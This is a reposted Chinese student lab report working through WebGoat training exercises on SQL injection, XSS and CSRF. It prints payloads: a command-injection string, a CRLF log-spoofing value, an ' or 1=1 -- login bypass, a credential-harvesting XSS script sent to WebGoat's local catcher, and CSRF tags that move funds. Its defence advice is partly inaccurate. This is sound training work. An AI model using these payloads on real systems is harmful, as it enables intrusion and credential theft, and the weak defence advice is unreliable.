2018-2019-2 网络对抗技术 20165305 Exp 9 Web安全基础

最新推荐文章于 2024-09-14 10:24:09 发布
最新推荐文章于 2024-09-14 10:24:09 发布
阅读量134 收藏
点赞数
文章标签: web安全 数据库 java
原文链接:http://www.cnblogs.com/2332175994-1314/p/10927440.html
版权
1.基础问题回答

(1)SQL注入攻击原理,如何防御

(2)XSS攻击的原理,如何防御

(3)CSRF攻击原理,如何防御

2.实践过程记录

WebGoat
SQL注入攻击

  1. 命令注入
  2. 日志欺骗
  3. LAB: SQL Injection

XSS攻击

  1. Phishing with XSS 跨站脚本钓鱼攻击
  2. 存储型XSS攻击(Stored XSS Attacks)
  3. Reflected XSS Attacks 反射型XSS攻击

CSRF攻击

  1. Cross Site Request Forgery(CSRF)
  2. SRF Prompt By-Pass
3.实验总结与体会

基础问题回答

(1)SQL注入攻击原理,如何防御
原理:
SQL注入漏洞是指在Web应用对后台数据库查询语句处理存在的安全漏洞。也就是,在输入字符串中嵌入SQL指令,在设计程序中忽略对可能构成攻击的特殊字符串的检查。后台数据库将其认作正常SQL指令后正常执行,可能实现对后台数据库进行各种操作,甚至造成破坏后台数据库等严重后果。
SQL注入一般分为普通注入和盲注:
普通注入:后台数据库会回显有价值的提示信息,通过这些可能的报错信息可以更容易地进行注入,适合新手入门训练。
盲注:后台管理员在给出错误页面时,没有提供详细错误信息。攻击者需要运用脚本通过仅有的判断信息(比如时间差)对表中的每一个字段进行探测,从而实现注入。
防御:不要在服务器端放置备份的文件以免受到感染,或备份的文件含有漏洞,造成切入点;
将数据库里的内容进行加密处理使其不具有特殊的意义。

(2)XSS攻击的原理,如何防御
原理:
攻击者利用网站漏洞(通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤),输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。
防御:在表单提交或者url参数传递前,对需要的参数进行过滤;
检查用户输入的内容中是否有非法内容。

(3)CSRF攻击原理,如何防御
原理:
CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统,类似于钓鱼。如用户当前已经登录了邮箱,或bbs,同时用户又在使用另外一个,已经被你控制的站点,我们姑且叫它钓鱼网站。这个网站上面可能因为某个图片吸引你,你去点击一下,此时可能就会触发一个js的点击事件,构造一个bbs发帖的请求,去往你的bbs发帖,由于当前你的浏览器状态已经是登陆状态,所以session登陆cookie信息都会跟正常的请求一样,纯天然的利用当前的登陆状态,让用户在不知情的情况下,帮你发帖或干其他事情。
防御:添加加随机验证;
设定cookie域。

实践过程

一、WebGoat

因WebGoat默认使用8080端口,所以开启前先用netstat -tupln | grep 8080查看端口是否被占用,如果被占用,用kill 进程号终止占用8080端口的进程。
普通安装,命令行输入java -jar webgoa t-container-7.0.1-war-exec.jar。
浏览器转:localhost:8080/WebGoat 直接用默认用户名密码登录即可,开始练习。
1296997-20190526202417228-47591361.png

1296997-20190526202423255-687861300.png

二、SQL注入攻击(Injection Flaws)

1.命令注入
先在左侧点击Injection Flaws,Command Injection,再右键点击页面,选择inspect Element审查网页元素对源代码进行修改,在复选框中任意一栏的代码,右键单击后,选择Edit At Html进行修改,添加"& netstat -an & ipconfig"
点击view,可以看到执行指令后的网络端口使用情况和IP地址。攻击成功!

1296997-20190526202508481-789198055.png

2.日志欺骗
点击Injection Flaws-Log Spoofing
在User Name中填入webgoat%0d%0aLogin Succeeded for username: admin,利用回车0D%和换行符%0A让其在日志中两行显示
输入密码后点击Login,可以看到webgoat在Login Fail那行显示,我们自己添加的语句在下一行显示。
1296997-20190526202552546-278836793.png

3.LAB: SQL Injection
在密码框输入' or 1=1 --,登录失败,会发现密码只有一部分输入,说明密码长度有限制。
我们在密码框右键选择inspect Element审查网页元素对长度进行修改 。
重新输入' or 1=1 --,登录成功。
1296997-20190526203050755-1146383029.png

三、XSS攻击

1. Phishing with XSS 跨站脚本钓鱼攻击
一个带用户名和密码输入框的表格如下:

<form>
<br><br><HR><H3>This feature requires account login:</H3 ><br><br> 
Enter Username:<br><input type="text" id="user" name="user"><br> 
Enter Password:<br><input type="password" name = "pass"><br> 
</form><br><br><HR>

在XSS-Phishing with XSS搜索上面代码,可以看到页面中增加了一个表单。

1296997-20190526203234520-109164371.png

现在我们需要一段脚本:

<script>
function hack()
{ 
    alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); 
    XSSImage=new Image; 
    XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";
}
</script>

这段代码会读取我们在表单上输入的用户名和密码信息,将这些信息发送给捕获这些信息的WebGoat。
将上面两段代码合并搜索。

<script>
function hack()
{ 
  alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); 
  XSSImage=new Image; 
  XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";
} 
</script>
<form>
<br><br><HR><H3>This feature requires account login:</H3 ><br><br> 
Enter Username:<br><input type="text" id="user" name="user"><br> 
Enter Password:<br><input type="password" name = "pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form><br><br><HR>

我们在搜索到的表单中输入用户名和密码,点击登录,WebGoat会将输入的信息捕获并反馈给我们。
1296997-20190526203240418-1408758634.png

2.存储型XSS攻击(Stored XSS Attacks)
在title中任意输入字符,留言板中输入<script>alert("I am 20165305. You've been attacked!!!");</script>
点击刚才输入的title,然后会弹出一个对话框,证明XSS攻击成功。
1296997-20190526203932337-1539619091.png

3. Reflected XSS Attacks 反射型XSS攻击

Enter your three digit access code:中输入<script>alert("I am 20165305");</script>点击Purchase,成功显示警告框,内容为我们script脚本指定的内容。

1296997-20190526203946248-454199.png

四、CSRF攻击

1.Cross Site Request Forgery(CSRF)
点击XSS-Cross Site Request Forgery(CSRF)
查看页面右下方Parameters中的src和menu值.
在Message框中输入<img src="http://localhost:8080/WebGoat/attack?Screen=520&menu=900&transferFunds=10000" width="1" height="1" />,以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件,点击Submit提交(其中语句中的&transferFunds=10000,即转走的受害人的金额;宽高设置成1像素的目的是隐藏该图片)
输入任意Title,提交后,在Message List中生成以Title命名的链接(消息)。点击该消息,当前页面就会下载这个消息并显示出来,转走用户的10000元,从而达到CSRF攻击的目的。

1296997-20190526203953356-471239413.png

2. CSRF Prompt By-Pass
点击XSS-CSRF Prompt By-Pass
同上面的攻击,查看页面右下方的Parameters中的src和menu值,并输入任意的Title,message框中输入代码

<iframe src="attack?Screen=536&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=536&menu=900&transferFunds=CONFIRM"> </iframe>

点击Submit生成以Title命名的链接,点击链接,攻击成功
1296997-20190526203959034-691468221.png

实验总结与体会

本次实验基本上都是在webgoat里面实现的,所以我认为本次实验的难点在于webgoat的使用。在webgoat的列表中有很多的模块,而我从里面选了一些比较典型的进行了实验。我认为本次实验还不是很难。

转载于:https://www.cnblogs.com/2332175994-1314/p/10927440.html

weixin_30316097
关注
cve-2019-0708-poc-exp.zip
05-20
"CVE-20190708-exp"和"CVE-2019-07-08-p"以及"CVE20190708-exp-"是与该漏洞相关的标签,用于标记和追踪与这个安全事件有关的讨论、文章和资源。这些标签帮助研究人员和安全专业人员快速定位与这个特定漏洞相关的消息...
基于 WebGoat 平台的 SQL 注入攻击
Labulongdong的博客
10-19 2972
基于 WebGoat 平台的 SQL 注入攻击
20145326蔡馨熤《网络对抗》—— Web安全基础实践
weixin_30908941的博客
05-11 190
20145326蔡馨熤《网络对抗》—— Web安全基础实践 1.实验后回答问题 (1)SQL注入攻击原理,如何防御. 原理: SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理,SQL注入...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
weblogic CVE-2018-2628--exp
01-20
weblogic CVE-2018-2628--exp
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
CVE-2018-8120 Microsoft Windows提权漏洞 Exp_64
06-10
CVE-2018-8120 Microsoft Windows提权漏洞 Exp_32 该资源适用于64位windows操作系统
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2432
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全】漏洞挖掘
anquan2233的博客
08-29 2000
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 726
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
如何用3个月零基础入门网络安全?_网络安全基础怎么学习
2401_84466224的博客
09-11 921
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全 L2 Introduction to Cryptography 密码学
weixin_74400487的博客
09-12 1205
2.1.2.Integrity3.4.1. no observer can access the contents of the message.确保只有授权的接收者能够阅读或访问消息,防止未授权的第三方获取敏感信息。2. no observer can identify the sender and receiver.保护通信双方的身份信息,防止第三方知道谁在发送消息以及消息是发送给谁的。
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览
WAJXY2021的博客
09-12 1000
整理了2024年国内发布的网络安全领域相关政策法规,希望能为广大从业者与关注者提供相关参考,共同促进网络安全生态的健康发展。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-09 1635
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全宣传周 | DNS安全威胁与应对措施分享
weixin_53018687的博客
09-12 1137
然而,DNS协议在设计初期只注重功能的实现,未充分考虑安全验证机制,缺乏有效的安全防御手段,DNS协议数据包往往能够在网络中畅通无阻,为攻击者提供了可乘之机,这一天生的设计缺陷使得DNS系统天然地成为了安全领域的薄弱环节。DNS劫持:DNS劫持是指攻击者通过篡改DNS解析结果,将用户的流量重定向到不同的IP地址,通常是恶意网站。DNS泛洪攻击:DNS洪泛攻击是一种拒绝服务攻击攻击者通过发送大量的DNS请求,通常是伪造的或毫无意义的查询,消耗DNS服务器的资源,使其无法响应合法的查询请求。
Web安全网络安全:SQL漏洞注入
hong161688的博客
09-10 863
Web安全领域,SQL注入漏洞(SQL Injection Vulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行详细阐述。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-08 1774
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全-dom破坏结合jq漏洞以及框架漏洞造成的xss-World War 3
m0_68976043的博客
09-10 866
如果notify为真的话那么html是代码解析meme-code的值在页面随便输入一个text=aaaa&img=bbbbb很明显调用到这里因为text和img都存在了而我们可以很明显看到一点Meme Code没值,没值的话那就代表onload根本没有加载,当我们什么都没写的情况下很明显加载值了当我们把地址参数写对的情况下,我们的onload很明显是可以执行的而我们从始至终都没有看到created...,因为notify是false1.绕过过滤框架2.html 逃逸出style标签。
2024网络安全与黑客技术:零基础自学手册
2401_85027336的博客
09-13 2229
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
MSP-EXP430G2开发板基础操作详解
MSP-EXP430G2开发板是一块针对TI MSP430G2xx系列的低成本实验平台,专为嵌入式系统开发设计。它具备USB驱动的集成仿真器,提供了全面的软件和硬件开发支持,包括集成的DIP目标插座、板上Flash仿真工具,以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值